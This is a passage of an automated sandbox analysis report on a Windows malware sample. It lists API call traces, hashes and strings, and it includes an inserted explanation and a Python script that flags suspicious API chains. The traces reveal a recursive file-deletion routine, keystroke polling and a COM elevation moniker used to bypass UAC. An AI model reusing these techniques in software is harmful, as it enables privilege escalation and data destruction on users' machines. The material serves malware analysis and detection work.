                          • RemoveDirectoryW.KERNEL32(?), ref: 0041DCC4
                          • GetLastError.KERNEL32 ref: 0041DCD6
                          • LocalFree.KERNEL32(?), ref: 0041DCE8
                          • DeleteFileW.KERNEL32(00000000), ref: 0041DD16
                          • FindNextFileW.KERNEL32(000000FF,?), ref: 0041DD27
                          • FindClose.KERNEL32(000000FF), ref: 0041DD39
                          • GetLastError.KERNEL32 ref: 0041DD49
                          • LocalFree.KERNEL32(00000000), ref: 0041DD58
                          • LocalFree.KERNEL32(00000000), ref: 0041DD62
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Local$AllocFileFindFree$ErrorLastObjectSingleWaitlstrcmp$CloseDeleteDirectoryFirstNextRemove
                          • String ID: %s%s$%s%s\$%s*.*
                          • API String ID: 1956538834-784047915
                          • Opcode ID: a56bc324d6591ed3f6a020122f8c3eb6f4a1c5023e6feb158143234c9c72617f
                          • Instruction ID: a8785c28ed827b9a64c5c1a3895a20f9f256fbcf8a37a1f4dbc80d81155661f4
                          • Opcode Fuzzy Hash: a56bc324d6591ed3f6a020122f8c3eb6f4a1c5023e6feb158143234c9c72617f
                          • Instruction Fuzzy Hash: D5517FB5A04209EBCB14EFA4DD8DBEA7779FF48301F1045A9F60997290D778A980CF58
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00420AE8
                          • und_memcpy.LIBCMTD ref: 00420B0D
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420B1D
                          • wsprintfW.USER32 ref: 00420B59
                          • GetForegroundWindow.USER32(?), ref: 00420B72
                          • SetWindowTextW.USER32(00000000), ref: 00420B79
                          • LocalFree.KERNEL32(00000000), ref: 00420BD3
                          • CloseHandle.KERNEL32(00000000), ref: 00420BDD
                          • LocalFree.KERNEL32(00000000), ref: 00420C0A
                          • CloseHandle.KERNEL32(00000000), ref: 00420C14
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00420C3A
                          • LocalFree.KERNEL32(00000000), ref: 00420C59
                          • CloseHandle.KERNEL32(00000000), ref: 00420C63
                          • CloseHandle.KERNEL32(00000000), ref: 00420CC5
                          • LocalFree.KERNEL32(00000000), ref: 00420CCF
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Local$CloseFreeHandle$Window$AllocCreateEventForegroundInfoLocaleText___crtund_memcpywsprintf
                          • String ID:
                          • API String ID: 1168742068-0
                          • Opcode ID: a9665ef2fd3f3a9d1704eee2cfc6d8e8ab9175ce289b116dd73683be853bcc80
                          • Instruction ID: dd28a540914ffa5139adb5b01d37b93b9a8ff240ad12196941be41d739b6b553
                          • Opcode Fuzzy Hash: a9665ef2fd3f3a9d1704eee2cfc6d8e8ab9175ce289b116dd73683be853bcc80
                          • Instruction Fuzzy Hash: 94714FB4A04209EFCB14DF94E948BEEBBB4FF48305F108659EA15A7381C778AA45CF54
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 004208D5
                          • und_memcpy.LIBCMTD ref: 004208FA
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042090A
                          • LocalFree.KERNEL32(00000000), ref: 00420977
                          • CloseHandle.KERNEL32(00000000), ref: 00420981
                          • LocalFree.KERNEL32(00000000), ref: 004209A6
                          • CloseHandle.KERNEL32(00000000), ref: 004209B0
                          • CloseHandle.KERNEL32(00000000), ref: 00420A98
                          • LocalFree.KERNEL32(00000000), ref: 00420AA2
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Local$CloseFreeHandle$AllocCreateEventund_memcpy
                          • String ID:
                          • API String ID: 1832378476-0
                          • Opcode ID: c0437896914665ae833224e6cf5b13284bd79414798874605a2f9944287931af
                          • Instruction ID: 238fbec80c250b7923099f22145295008854e0298cd58d4bd81cb5720764c8b3
                          • Opcode Fuzzy Hash: c0437896914665ae833224e6cf5b13284bd79414798874605a2f9944287931af
                          • Instruction Fuzzy Hash: 81614D74A00209EFCB14CFA4D949BEEBBB4FF48304F508159EA15A7381C738AA45CF94
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00420D15
                          • und_memcpy.LIBCMTD ref: 00420D3A
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420D4A
                          • LocalFree.KERNEL32(00000000), ref: 00420DB7
                          • CloseHandle.KERNEL32(00000000), ref: 00420DC1
                          • LocalFree.KERNEL32(00000000), ref: 00420DE6
                          • CloseHandle.KERNEL32(00000000), ref: 00420DF0
                          • CloseHandle.KERNEL32(00000000), ref: 00420EBD
                          • LocalFree.KERNEL32(00000000), ref: 00420EC7
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Local$CloseFreeHandle$AllocCreateEventund_memcpy
                          • String ID:
                          • API String ID: 1832378476-0
                          • Opcode ID: 72de49ab070d0855317d2ae24b32e4c164f03b9f9af2a54e41da1b4bb19c17a5
                          • Instruction ID: 84c965324fae4c90f16cd7a5d024afcab81d1cdef434bd8de29a62c46187d57c
                          • Opcode Fuzzy Hash: 72de49ab070d0855317d2ae24b32e4c164f03b9f9af2a54e41da1b4bb19c17a5
                          • Instruction Fuzzy Hash: C2616E74A00219EFCB14DFA4E949BEEBBB5FF48304F108559EA15A7381C738A985CF94
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00420F15
                          • und_memcpy.LIBCMTD ref: 00420F3A
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420F4A
                          • LocalFree.KERNEL32(00000000), ref: 00420FC3
                          • CloseHandle.KERNEL32(00000000), ref: 00420FCD
                          • LocalFree.KERNEL32(00000000), ref: 00420FFA
                          • CloseHandle.KERNEL32(00000000), ref: 00421004
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00421026
                          • LocalFree.KERNEL32(00000000), ref: 00421078
                          • CloseHandle.KERNEL32(00000000), ref: 00421082
                          • CloseHandle.KERNEL32(00000000), ref: 0042109A
                          • LocalFree.KERNEL32(00000000), ref: 004210A4
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Local$CloseFreeHandle$AllocCreateEventInfoLocale___crtund_memcpy
                          • String ID:
                          • API String ID: 1193138003-0
                          • Opcode ID: 61a4a398a4dfdbca18395684b1accd05abc16e4ff97bb353428f0b8f0145af52
                          • Instruction ID: 51dc9425620134e15ff5e2344ba80fe2df1834fe2a4062b14902e29be8b06d81
                          • Opcode Fuzzy Hash: 61a4a398a4dfdbca18395684b1accd05abc16e4ff97bb353428f0b8f0145af52
                          • Instruction Fuzzy Hash: 74518274E00219EFCB14DFA4E948BAEBBB4FF48304F108159EA15A7390C778A985CF59
                          APIs
                          • _memset.LIBCMT ref: 004072BF
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • _memset.LIBCMT ref: 0040730A
                            • Part of subcall function 00418A30: _memmove.LIBCMT ref: 00418A88
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: _memset$_memmovelstrlen
                          • String ID: PT%dS$PT0S$default
                          • API String ID: 3502740365-2476591505
                          • Opcode ID: af3ac5dbcbf2901f0bfdeb678b64e62f9a825beed46d3ec4881f38901028f9dc
                          • Instruction ID: ce44bb1052d4145eeff6889e18c016f7d7dc6c7cacb71b6e9c991632b859b78d
                          • Opcode Fuzzy Hash: af3ac5dbcbf2901f0bfdeb678b64e62f9a825beed46d3ec4881f38901028f9dc
                          • Instruction Fuzzy Hash: EF92F574A04619DFCB64DF14CC84B99B7B5AF88304F1082EAE50DA73A0DB35AE81CF55
                          APIs
                          • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,?,00421576,?), ref: 00421742
                          • wsprintfA.USER32 ref: 00421790
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004217D1
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 0042180A
                          • und_memcpy.LIBCMTD ref: 0042183A
                          • LocalFree.KERNEL32(00000000), ref: 00421846
                          • LocalFree.KERNEL32(00000000), ref: 00421854
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Local$FreeInfoLocale___crt$Allocund_memcpywsprintf
                          • String ID:
                          • API String ID: 573794981-0
                          • Opcode ID: 09e864ce7370a8d46b35f0e12868df88d5ec713e090bcc57874a64dee3c3d77e
                          • Instruction ID: d4ee76e6c914feda94d9d877a3cccb2607968a9df67d6c93f36d2a086787deb9
                          • Opcode Fuzzy Hash: 09e864ce7370a8d46b35f0e12868df88d5ec713e090bcc57874a64dee3c3d77e
                          • Instruction Fuzzy Hash: BC415FB5E00219AFCB04DF94D881ABFBBB5FF98304F14854DE609A7351D635A941CBA4
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: aee39f4793dd6efacc8bfe94317fd393fa5a05ae3d136c3ddc80eaf08b1b96b3
                          • Instruction ID: 0f41a721227a78baec1e3b4351c12b98976e287611a93d31967cef47b8d17757
                          • Opcode Fuzzy Hash: aee39f4793dd6efacc8bfe94317fd393fa5a05ae3d136c3ddc80eaf08b1b96b3
                          • Instruction Fuzzy Hash: 7FB14F74A00218DFCB24CF94E994BDDBBB1FF58308F60811AE905AB394D779A986CF45
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: 3cd93d966e497bfb57ae1ef21dace33f0b8971bc2c1097af13e1f0d569e376ff
                          • Instruction ID: 57d306131c6df6584980f38f22f081f6ded00a43f19351454401da55e8b5c5b4
                          • Opcode Fuzzy Hash: 3cd93d966e497bfb57ae1ef21dace33f0b8971bc2c1097af13e1f0d569e376ff
                          • Instruction Fuzzy Hash: 21B12F70A00218EFDB14CF84E984BAEB7B1FF58308F60815AE905A7394C7B9AD85CF45
                          APIs
                          • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,0042150F,?), ref: 00421602
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 0042166D
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004216A6
                          • und_memcpy.LIBCMTD ref: 004216D6
                          • LocalFree.KERNEL32(00000000), ref: 004216E2
                          • LocalFree.KERNEL32(00000000), ref: 004216F0
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Local$FreeInfoLocale___crt$Allocund_memcpy
                          • String ID:
                          • API String ID: 1193788099-0
                          • Opcode ID: 1282fa304bbfc87acd26351ccb1f38f00b7fdd73e2f2856893c1dd7c46bc59a9
                          • Instruction ID: 5bac126bd23974c04984f3e5f5f0ee040623d58c1044a77f072663fefbf3ada1
                          • Opcode Fuzzy Hash: 1282fa304bbfc87acd26351ccb1f38f00b7fdd73e2f2856893c1dd7c46bc59a9
                          • Instruction Fuzzy Hash: 2C4171B4E00219AFCB04DF94D981EBFB7B5BF98300F648549E909A7342D635EA41CBA5
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0042D630
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042D645
                          • UnhandledExceptionFilter.KERNEL32(0043AEE0), ref: 0042D650
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0042D66C
                          • TerminateProcess.KERNEL32(00000000), ref: 0042D673
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 0335d1d99c6a3edca7eeeced85f5ff9b16a31f1680bcacd78d866e4256513115
                          • Instruction ID: d859bb3f44c2e61071292196ca601b336e19eaa722fa04b4b4e3a13c6ceac289
                          • Opcode Fuzzy Hash: 0335d1d99c6a3edca7eeeced85f5ff9b16a31f1680bcacd78d866e4256513115
                          • Instruction Fuzzy Hash: 462102F5922308DFE784EF24F889A493BB0BB58300F50586EE80987761D7B459888F4D
                          APIs
                          • GetAsyncKeyState.USER32(0000001B), ref: 004133F5
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • Sleep.KERNEL32(000003E8), ref: 00413446
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: AsyncSleepStatelstrlen
                          • String ID: `CL`C
                          • API String ID: 1450562213-1431644962
                          • Opcode ID: 6be960fdff3c90a2a9132d39e79fb053b5185120e176c89ef64004096ca10001
                          • Instruction ID: 5dc7b231b24de6de9191f165a7941ff6f2d8c14447f93dc5e099c59aa51a6bfd
                          • Opcode Fuzzy Hash: 6be960fdff3c90a2a9132d39e79fb053b5185120e176c89ef64004096ca10001
                          • Instruction Fuzzy Hash: CF7114B0900328DBDB25DF10DD89BD9B7B0BB49309F1081EADA4D66280DB795BC9CF59
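The listings above are raw per-function API traces; the chains worth reading out of them are the CreateMutexW / OpenEventW / ExitProcess instance check at 004010D2-00401197 (the "evasive API chain" signature in the overview), the FindFirstFileW / RemoveDirectoryW / DeleteFileW / FindNextFileW loop over "%s*.*" at 0041DBF0-0041DD39 (a recursive directory wipe), and the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter / TerminateProcess sequence at 0042D630-0042D673. That last one is the MSVC CRT security-cookie failure handler, not a deliberate anti-debug check: the C0000409 (STATUS_STACK_BUFFER_OVERRUN) shown as the GetCurrentProcess argument is the exit status pushed for the TerminateProcess call that follows it, and the trace attributes stack arguments loosely. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses lines in the report's own "• API.MODULE(args), ref: addr" shape (the embedded input is copied from three of the listings above and is constructed for this example), then flags those three chains by in-order API matching. The rule names, the Rule/Entry types and the scan() helper are this editor's own, not anything the report defines.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed input: lines copied from three listings in the report above
# ("• API.MODULE(args), ref: addr"); lines in any other shape are skipped.
SAMPLE = r"""APIs
• Part of subcall function 00419140: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0041914E
• ExitProcess.KERNEL32 ref: 0040103B
• CreateMutexW.KERNELBASE(0000000C,00000000,0047B18C), ref: 004010D2
• OpenEventW.KERNEL32(00100002,00000000,004797F4), ref: 00401116
• ExitProcess.KERNEL32 ref: 00401197
APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 0041DBF0
• RemoveDirectoryW.KERNEL32(?), ref: 0041DCC4
• DeleteFileW.KERNEL32(00000000), ref: 0041DD16
• FindNextFileW.KERNEL32(000000FF,?), ref: 0041DD27
• FindClose.KERNEL32(000000FF), ref: 0041DD39
• String ID: %s%s$%s%s\$%s*.*
APIs
• IsDebuggerPresent.KERNEL32 ref: 0042D630
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042D645
• UnhandledExceptionFilter.KERNEL32(0043AEE0), ref: 0042D650
• GetCurrentProcess.KERNEL32(C0000409), ref: 0042D66C
• TerminateProcess.KERNEL32(00000000), ref: 0042D673
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^•\s*String ID:\s*(?P<strings>.*)$")

@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: int
    subcall: int | None = None  # set for "Part of subcall function" lines

@dataclass
class Entry:
    calls: list[Call] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)

def parse_entries(text: str) -> list[Entry]:
    entries: list[Entry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function listing opens with this label
            entries.append(Entry())
        elif entries and (m := API_RE.match(line)):
            entries[-1].calls.append(Call(
                m["api"], m["module"], m["args"].split(",") if m["args"] else [],
                int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        elif entries and (s := STRING_RE.match(line)):
            # the report joins a function's strings with "$" (a literal "$" would split too)
            entries[-1].strings = [x for x in s["strings"].split("$") if x]
    return entries

@dataclass(frozen=True)
class Rule:
    name: str
    sequence: tuple[str, ...]      # APIs that must occur in this order, gaps allowed
    strings: tuple[str, ...] = ()  # strings that must also be listed
    any_arg: str = ""              # substring that must appear in some argument

# Chains taken from the listings above. The third is the MSVC CRT security-cookie
# failure path (exit status C0000409): its IsDebuggerPresent is compiler boilerplate.
RULES = (
    Rule("mutex/event instance check", ("CreateMutexW", "OpenEventW", "ExitProcess")),
    Rule("recursive directory wipe",
         ("FindFirstFileW", "RemoveDirectoryW", "DeleteFileW", "FindNextFileW", "FindClose"),
         strings=("%s*.*",)),
    Rule("CRT security-cookie failure handler (benign)",
         ("IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
          "GetCurrentProcess", "TerminateProcess"), any_arg="C0000409"),
)

def in_order(names: list[str], seq: tuple[str, ...]) -> bool:
    it = iter(names)  # each any() resumes where the previous one stopped
    return all(any(n == want for n in it) for want in seq)

def match_rules(entry: Entry, rules: tuple[Rule, ...] = RULES) -> list[str]:
    names = [c.api for c in entry.calls]
    args = ",".join(a for c in entry.calls for a in c.args)
    return [r.name for r in rules if in_order(names, r.sequence)
            and all(s in entry.strings for s in r.strings) and r.any_arg in args]

def scan(text: str) -> dict[str, list[str]]:
    # key each listing by the address of its first own (non-subcall) call
    out: dict[str, list[str]] = {}
    for e in parse_entries(text):
        own = next((c for c in e.calls if c.subcall is None), None)
        out[f"{own.ref:08X}" if own else "unknown"] = match_rules(e)
    return out

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Subcall lines are kept in the call list, so a rule can also key on an API the function reaches indirectly (LoadLibraryW here); drop them in match_rules if only direct calls should count. The "(benign)" rule is deliberate: matching the CRT handler by its full shape and exit status keeps a lone IsDebuggerPresent from being counted as anti-debugging when triaging a report like this one.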
                          APIs
                          • GetCurrentProcess.KERNEL32(0047F5AC,?,00411363), ref: 00405718
                          • IsWow64Process.KERNEL32(00000000,?,00411363), ref: 0040571F
                          • GetProcessHeap.KERNEL32(?,00411363), ref: 00405725
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: Process$CurrentHeapWow64
                          • String ID:
                          • API String ID: 1399170734-0
                          • Opcode ID: d496d118f09599941a26e9c733203f0a4a70c826b5b79e42def2219493e40757
                          • Instruction ID: af7c7970e4141fd9cc10a4436380ba79c7009fbdb76590e30a28943a2f631dd8
                          • Opcode Fuzzy Hash: d496d118f09599941a26e9c733203f0a4a70c826b5b79e42def2219493e40757
                          • Instruction Fuzzy Hash: 60C01270612208ABC3142FA4FC0C6893EB8AB88742B101032F609C2261CA76A4908A28
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 0042085A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                          • Instruction ID: a4ad534ba2a4bf805be8d4b30e3cc69f12b4ab5ab6b99d98f60fd98b1426b109
                          • Opcode Fuzzy Hash: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                          • Instruction Fuzzy Hash: 4C21E8B4E00219EFCB04EF98D840AAFB7B4FB48304F50859AE924A7341D338AA51CF95
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004207BA
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                          • Instruction ID: 4cf18e1defdbbf8cddfd966b63cc91ce39fe56379c2cbf457ff4961cd6393e44
                          • Opcode Fuzzy Hash: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                          • Instruction Fuzzy Hash: CE21FCB4E00219EFCB04DF99D884AAEB7B5FB88304F50854AE82567341D774A951CF55
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004181C7
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: d0c201e7539ed4772464f86f123d7755a33d59086b143951abdcbfc63277f0e0
                          • Instruction ID: 0140c7c35a12c9d4d2f56a07fb600861de9f10bb1c8cf95726b017415bfd7771
                          • Opcode Fuzzy Hash: d0c201e7539ed4772464f86f123d7755a33d59086b143951abdcbfc63277f0e0
                          • Instruction Fuzzy Hash: 36018BB5A00208BBDB10DF94EC85BEE7774EF48704F10451DF604AB280EA799AC5C759
                          APIs
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004181C7
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt
                          • String ID:
                          • API String ID: 3761071962-0
                          • Opcode ID: 4ee6c721d7e74ba1b33508c59e008d077bbf9c5bf04e8e0524d3ee55038333e7
                          • Instruction ID: 0140c7c35a12c9d4d2f56a07fb600861de9f10bb1c8cf95726b017415bfd7771
                          • Opcode Fuzzy Hash: 4ee6c721d7e74ba1b33508c59e008d077bbf9c5bf04e8e0524d3ee55038333e7
                          • Instruction Fuzzy Hash: 36018BB5A00208BBDB10DF94EC85BEE7774EF48704F10451DF604AB280EA799AC5C759
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_0002B9DE), ref: 0042BA25
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 0db803ec54fc10e4d329c8e57eb35a83b0b4a84cff09d8a8d2f413425a5d23dc
                          • Instruction ID: 36f714616a88036eb55af27c2dd355b8890758f503912e421fffb43fd9c6d75b
                          • Opcode Fuzzy Hash: 0db803ec54fc10e4d329c8e57eb35a83b0b4a84cff09d8a8d2f413425a5d23dc
                          • Instruction Fuzzy Hash: 159002B0351911568E006BB16C0E68567949A9970679154E2A111D4154EB6450849969
                          APIs
                          • _memset.LIBCMT ref: 00401CBC
                          • _memset.LIBCMT ref: 00401CF5
                            • Part of subcall function 0041D2C0: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0040108A), ref: 0041D2CB
                            • Part of subcall function 0041D2C0: GetProcAddress.KERNEL32(0040108A,IsWow64Process), ref: 0041D2E4
                          • __snwprintf.LIBCMT ref: 00401D1F
                          • __snwprintf.LIBCMT ref: 00401D41
                          • _memset.LIBCMT ref: 00401D60
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00401DB1
                          • lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 00401E04
                          • lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 00401E1B
                          • lstrcpyW.KERNEL32(-00000648,00000000), ref: 00401E32
                          • lstrcpyW.KERNEL32(-00000850,0047BA14), ref: 00401E49
                          • lstrcpyW.KERNEL32(-00000A58,?), ref: 00401E63
                          • lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 00401E7A
                          • lstrcpyA.KERNEL32(-00000D28,CoInitialize), ref: 00401E92
                          • lstrcpyA.KERNEL32(-00000D8C,IIDFromString), ref: 00401EAA
                          • lstrcpyA.KERNEL32(-00000CC4,ExitProcess), ref: 00401EC1
                          • lstrcpyW.KERNEL32(-00000008,{6EDD6D74-C007-4E75-B76A-E5740995E24C}), ref: 00401ED6
                          • lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00401EEE
                            • Part of subcall function 00406DB0: _memset.LIBCMT ref: 00406DCA
                            • Part of subcall function 00406DB0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00406E85
                            • Part of subcall function 00406DB0: _memmove.LIBCMT ref: 00406EAF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset$HandleModule__snwprintf$AddressCurrentProcProcess_memmove
                          • String ID: %s\SysWOW64\explorer.exe$%s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${6EDD6D74-C007-4E75-B76A-E5740995E24C}
                          • API String ID: 3624918361-107688120
                          • Opcode ID: 40525253a5e8a5da89c892eb0bd58939c720b1a21b5e82951a1952ac76e647ac
                          • Instruction ID: c8fee24260e9be7943ba9fe3ab86d48d53a8280aae697df63fa7837ff87ae17c
                          • Opcode Fuzzy Hash: 40525253a5e8a5da89c892eb0bd58939c720b1a21b5e82951a1952ac76e647ac
                          • Instruction Fuzzy Hash: 4281A475A40218ABDB24DF60DC49FD977B6EFD8700F0044E9F609A2290DB79AAD4CF58
